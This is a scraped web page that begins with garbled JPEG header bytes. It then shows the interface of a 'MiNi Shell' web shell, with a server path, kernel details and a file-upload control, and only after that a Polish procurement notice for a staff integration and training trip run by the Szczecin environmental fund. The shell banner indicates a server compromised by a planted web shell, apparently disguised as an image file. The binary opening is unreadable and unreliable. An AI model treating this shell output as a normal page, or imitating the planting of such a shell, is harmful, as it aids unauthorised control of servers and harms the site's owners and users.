JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250721/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250721/0033689301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa organizacja wyjazdu integracyjno-szkoleniowego dla pracowników Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Szczecinie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Szczecinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 320785039</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ludwika Solskiego 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">71-323</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@wfos.szczecin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wfos.szczecin.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa organizacja wyjazdu integracyjno-szkoleniowego dla pracowników Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Szczecinie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-57379e00-bfc3-4b28-8ea7-1db7d95b6ae2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00336893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00013354/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Wyjazd szkoleniowo integracyjny</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-57379e00-bfc3-4b28-8ea7-1db7d95b6ae2 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim za pośrednictwem Platformy e-Zamówienia . Link prowadzący bezpośrednio do widoku postępowania na Platformie https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-57379e00-bfc3-4b28-8ea7-1db7d95b6ae2 <br/>2.	Komunikacja między Zamawiającym, a wykonawcami, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu elektronicznej Platformy, z zastrzeżeniem art. 61 ust. 2 ustawy Pzp. <br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy określa Regulamin Platformy, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>Osoba uprawniona do kontaktu: Beata Czerska, adres e-mail: zamówienia@wfos.szczecin.pl<br/>4. Pozostałe informacje - w Rozdz. 8 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>2.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>3.	Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>4.	Korzystanie z Platformy e-Zamówienia jest jednoznaczne z akceptacją Regulaminu Platformy e-Zamówienia.<br/>8.17.	Sposób sporządzania i przekazywania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452), (zw. dalej „Rozporządzeniem w sprawie wymagań dla dokumentów elektronicznych”).<br/>5.	Dokumenty elektroniczne, o których mowa w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (t.j. Dz.U. z 2024 r., poz. 773), (zw. dalej „Rozporządzeniem w sprawie Krajowych Ram Interoperacyjności”), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>6.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1)	w formatach danych określonych w przepisach Rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>2)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści „Wyślij wiadomość do zamawiającego”).<br/>7.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku „Dokumenty niejawne np. Tajemnica przedsiębiorstwa”.<br/>8.	Oznaczenie czasu odbioru danych przez Platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>9.	Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu.<br/>10.	Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie przez Wykonawcę oferty w zakładce „Wyślij wiadomość do Zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy Pzp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna<br/>o przetwarzaniu danych osobowych przez Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Szczecinie<br/><br/>Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. (Dz. Urz. UE L 119 z 04.05.2016 dalej: RODO) informujemy, iż:<br/>1.	Administratorem danych osobowych jest Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Szczecinie z siedzibą w Szczecinie, ul. Solskiego 3, 71-323 Szczecin. <br/>2.	Istnieje możliwość kontaktu z inspektorem ochrony danych poprzez adres e-mail: iod@wfos.szczecin.pl,<br/>3.	Państwa dane osobowe będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w postępowaniu oraz ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320 z późn. zm.) .),<br/>4.	Zgodnie z zasadą jawności określoną w Prawie zamówień publicznych Państwa dane zebrane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane mogą być wszystkim zainteresowanym podmiotom i osobom. Ograniczenie tego dostępu może wystąpić w szczególnych przypadkach określonych przepisami. Dane przekazywane będą również podmiotom uczestniczącym w wykonywaniu czynności polegających na obsłudze lub udostępnianiu Funduszowi narzędzi teleinformatycznych. <br/>5.	Dane osobowe nie będą przekazywane do państwa trzeciego ani organizacji międzynarodowej. <br/>6.	Dane osobowe przechowywane będą przez okres niezbędny do realizacji celu dla jakiego zostały zebrane, zgodnie z obowiązującym w WFOŚiGW w Szczecinie jednolitym rzeczowym wykazem akt.<br/>7.	Osobie, której dane są przetwarzane przysługuje prawo dostępu do treści danych oraz żądania ich sprostowania, usunięcia, ograniczenia przetwarzania oraz prawo wniesienia sprzeciwu względem przetwarzania danych i prawo do przenoszenia danych.<br/>8.	Zebrane dane osobowe nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.<br/>9.	Osoby, których dane są przetwarzane mają prawo do wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie danych osobowych przez WFOŚiGW w Szczecinie. Organem właściwym dla ww. skargi jest: Urząd Ochrony Danych Osobowych w Warszawie. <br/>10.	Podanie danych osobowych w związku z udziałem w postępowaniu o zamówienia publiczne jest dobrowolne, ale może być warunkiem niezbędnym do wzięcia w nim udziału.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BS/ZO/BC/203/008/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest kompleksowa organizacja trzydniowego wyjazdu, w tym dwa noclegi,<br/>integracyjno-szkoleniowego dla pracowników Wojewódzkiego Funduszu Ochrony Środowiska <br/>i Gospodarki Wodnej w Szczecinie. <br/>Termin: 26-28 września 2025 r.<br/><br/>W wyjeździe weźmie udział ok. 85 osób. Zamawiający zakłada, że z przyczyn niezależnych od Zamawiającego ilość osób może ulec zmianie, tj. +/-10 osób. <br/>W formularzu oferty w części dotyczącej ceny za usługę hotelową Wykonawca wskaże cenę jednostkową za osobę oraz wartość wynikającą z iloczynu ceny jednostkowej i szacowanej ilości osób, tj. 85. Ostateczną liczbę uczestników wyjazdu Zamawiający zgłosi Wykonawcy najpóźniej na 15 dni roboczych przed planowaną datą wyjazdu.<br/><br/><br/>2.	Program ramowy wyjazdu :<br/>1)	Odbiór osób biorących udział w wyjeździe integracyjno-szkoleniowym nastąpi z dwóch lokalizacji Zamawiającego:<br/>a)	Biuro Szczecin, ul. Solskiego 3, 71-323 Szczecin ok. 42 osoby<br/>b)	Biuro Koszalin, ul. Zwycięstwa 111, 75-601 Koszalin ok. 29 osób<br/> Zamawiający informuje, iż niektóre osoby biorące udział w wyjeździe dotrą do miejsca zakwaterowania we własnym zakresie.<br/>2)	pierwszy dzień (26.09.2025 r.):<br/>a)	wyjazd ze Szczecina w godz. 14:00-16:00 ) przejazd do miejsca docelowego, zakwaterowanie w pokojach,<br/>b)	wyjazd z Koszalina w godz. 14:00-16:00, 1) przejazd do miejsca docelowego, zakwaterowanie w pokojach,<br/>c)	obiadokolacja z DJ,<br/>3)	drugi dzień (27.09.2025 r.) – śniadanie, szkolenie, obiad, dodatkowa atrakcja, kolacja z DJ, <br/>4)	trzeci dzień (28.09.2025 r.) – śniadanie, wyjazd, powrót do:<br/>a)	Biuro Szczecin, ul. Solskiego 3, 71-323 Szczecin<br/>b)	Biuro Koszalin, ul. Zwycięstwa 111, 75-601 Koszalin.<br/><br/>Rozdz. II.	Szczegółowe obowiązki Wykonawcy<br/><br/>1.	W ramach wynagrodzenia Wykonawca będzie zobowiązany do:<br/>1)	zapewnienia transportu:<br/>Autokar/Bus (pojazd) musi być wyposażony w tyle miejsc siedzących, by pomieścić wszystkich uczestników wyjazdu. Ponadto musi być wyposażony w siedzenia z pasami bezpieczeństwa, sprawną klimatyzację, sprawne ogrzewanie. Wykonawca zobowiązuje się podstawić autokar/bus w należytym stanie technicznym oraz zapewnić posiadanie przez kierowcę pojazdu wszystkich niezbędnych i aktualnych dokumentów pojazdu, w tym ubezpieczenia OC. W przypadku awarii autokaru/busa uniemożliwiającej dalszą jazdę, Wykonawca zobowiązuje się bez zbędnej zwłoki podstawić pojazd zastępczy o co najmniej tym samym standardzie, który pozwoli na planowe kontynuowanie przejazdu, bez dodatkowych kosztów po stronie Zamawiającego. Wykonawca pokrywa wszystkie koszty związane z opłatami drogowymi i parkingowymi. Wykonawca zobowiązany jest do zapewnienia zawarcia wszelkich wymaganych polis ubezpieczeniowych uczestników wyjazdu integracyjno-szkoleniowego, zgodnie z obowiązującymi przepisami:<br/>- ubezpieczenie musi obejmować Następstwa Nieszczęśliwych Wypadków (NNW);<br/>- uczestnicy wyjazdu integracyjno-szkoleniowego muszą być objęci ubezpieczeniem NNW na kwotę minimum 15 000,00 złotych każdy.<br/>Zamawiający wymaga dwóch pojazdów, zapewniających wszystkim miejsca siedzące, jeden dla osób wyjeżdżający/powracających ze/do Szczecina, jeden dla osób wyjeżdżający/powracających z/do Koszalina.<br/><br/>2)	zapewnienia noclegu:<br/>a)	Zamawiający wymaga by obiekt hotelarski spełniał standard minimum jak dla hotelu 3 gwiazdkowego, w rozumieniu przepisów Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2017 r. poz. 2166). Zamawiający nie wymaga aby obiekt hotelarski przewidziany do zakwaterowania posiadał decyzję o zaszeregowaniu do rodzaju oraz nadania kategorii *** (trzy gwiazdki lub więcej gwiazdek), zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2017 r. poz. 2166).Obiekt hotelowy/zakwaterowania musi mieścić się w granicach administracyjnych województwa zachodniopomorskiego. Zamawiający nie dopuszcza obiektu hotelowego/zakwaterowania typu: schronisko, kemping, pole biwakowe. Zamawiający wymaga zakwaterowania wszystkich uczestników wyjazdu w jednym budynku/obiekcie hotelarskim .<br/><br/>3)	zapewnienia uczestnikom wyjazdu integracyjno-szkoleniowego wyżywienia zgodnie <br/>z minimalnymi wymaganiami określonymi poniżej w obiekcie hotelowym, w którym odbywać będzie się nocleg:<br/>a)	obiadokolacja integracyjna serwowana pierwszego dnia wyjazdu oraz drugiego dnia wyjazdu, w formie szwedzkiego stołu (ciepły i zimny bufet, w godzinach ustalonych z Zamawiającym, w oddzielnej sali przeznaczonej wyłącznie dla uczestników wyjazdu integracyjno-szkoleniowego <br/>b)	obiad serwowany drugiego dnia wyjazdu integracyjno-szkoleniowego (w godzinach ustalonych <br/>z Zamawiającym) w formie porcjowanej do wyboru uczestnika:<br/>- zupę lub krem do wyboru – 2 rodzaje w tym jedna wegetariańska, min. 250 ml porcja,<br/>- dania główne na ciepło - 3 rodzaje, w tym: 2 dania mięsne, danie wegetariańskie min. 150 g porcja (dotyczy każdego dania), <br/>- dodatki skrobiowe do wyboru (2 rodzaje – np. ryż, ziemniaki gotowane lub ziemniaki opiekane w ziołach, kluski śląskie), min. 200 g porcja,<br/>- sałatki i surówki do wyboru lub mix – 4 rodzaje, min. 100 g porcja,<br/>- deser - 2 rodzaje do wyboru– -, min. 150 g na osobę,<br/>- ciasta 2 rodzaje, min. 100 g na osobę<br/>- owoce krojone – 4 rodzaje bez ograniczeń,<br/>- wodę mineralną gazowaną i niegazowaną (bez ograniczeń), soki owocowe 100% (bez ograniczeń)<br/>- kawę czarną z ekspresu ciśnieniowego, do samodzielnego zaparzania przez uczestników wyjazdu), kawa z mlekiem z ekspresu ciśnieniowego (do samodzielnego zaparzania przez uczestników wyjazdu)<br/>- herbatę w saszetkach bez ograniczeń (minimum 3 rodzaje, w tym czarna, zielona i owocowa),<br/>- dodatki do napojów w postaci cukru, cytryny i mleka (bez ograniczeń).<br/>Co najmniej 21 dni przed planowanym rozpoczęciem wyjazdu, Wykonawca przedstawi Zamawiającemu zestawy obiadowe do wyboru przez uczestników wyjazdu. Zamawiający w terminie nie krótszym niż 10 dni przed dniem wyjazdu do miejsca zakwaterowania prześle Wykonawcy wybrany przez uczestnika zestaw. <br/>c)	śniadania dla wszystkich uczestników wyjazdu szkoleniowego, serwowane drugiego i trzeciego dnia wyjazdu, w formie szwedzkiego stołu (ciepły i zimny bufet) zgodnie ze standardem obiektu hotelowego;<br/><br/>4)	Dodatkowe atrakcje <br/>Wykonawca zaproponuje (złoży wraz z ofertą) co najmniej dwie atrakcje do wyboru uwzględniające możliwości aktywności dostosowane do okolicy miejsca zakwaterowania. Czas: popołudnie drugiego dnia pobytu lub podczas obiadokolacji drugiego dnia (do uzgodnienia z Zamawiającym), co najmniej 3 godziny. Wykonawca może zaproponować różnego rodzaju atrakcje, również w zakresie kulturalnym lub historycznym.<br/>Wykonawca zapewni dowóz uczestników wyjazdu na miejsce i odwóz do miejsca zakwaterowania w przypadku atrakcji poza miejscem zakwaterowania. Ostateczny wybór nastąpi po akceptacji Zamawiającego, przed zawarciem umowy. <br/><br/>5)	Inne atrakcje:<br/>Podczas obiadokolacji (2 szt.) zapewnienie DJ co najmniej do godziny 3 dnia następnego.<br/><br/>6)	Organizacji szkolenia dla uczestników wyjazdu: <br/>Szkolenie z zakresu komunikacji interpersonalnej/team building. <br/>Cel: rozwój kompetencji miękkich, usprawnienie komunikacji i współpracy pomiędzy zespołami, wzmocnienie więzi między pracownikami. Praktyczna nauka umiejętności społecznych potrzebnych do pracy w zespole po to by skuteczniej przekazywać informacje i efektywniej wykonywać zadania.<br/>Oczekiwane korzyści wynikające z uczestnictwa w szkoleniu:<br/>- efektywniejsza praca zespołu,<br/>- wzrost motywacji, poczucie wspólnej pracy i wspólnego sukcesu.<br/>Wykonawca uwzględni dwa scenariusze szkoleniowe w zależności od warunków atmosferycznych: szkolenie w budynku lub w plenerze.<br/>Zapewnienie trenera i materiałów szkoleniowych.<br/>Zapewnienie sali szkoleniowej w obiekcie hotelowym, w którym jest zakwaterowanie uczestników wyjazdu szkoleniowego.<br/>Czas trwania szkolenia: min. 4 h.<br/>Scenariusze będą załącznikiem do oferty.<br/>Ostateczny kształt i forma szkolenia zostanie ustalona z Wykonawcą co najmniej na 14 dni roboczych przed wyjazdem. <br/> Pozostałe informacje znajdują się w załączniku nr 6 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">63510000-7 - Usługi biur podróży i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55000000-0 - Usługi hotelarskie, restauracyjne i handlu detalicznego</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55120000-7 - Usługi hotelarskie w zakresie spotkań i konferencji</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">60170000-0 - Wynajem pojazdów przeznaczonych do transportu osób wraz z kierowcą</p> <p class="mb-0">79632000-3 - Szkolenie pracowników</p> <p class="mb-0">80000000-4 - Usługi edukacyjne i szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-26 do 2025-09-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 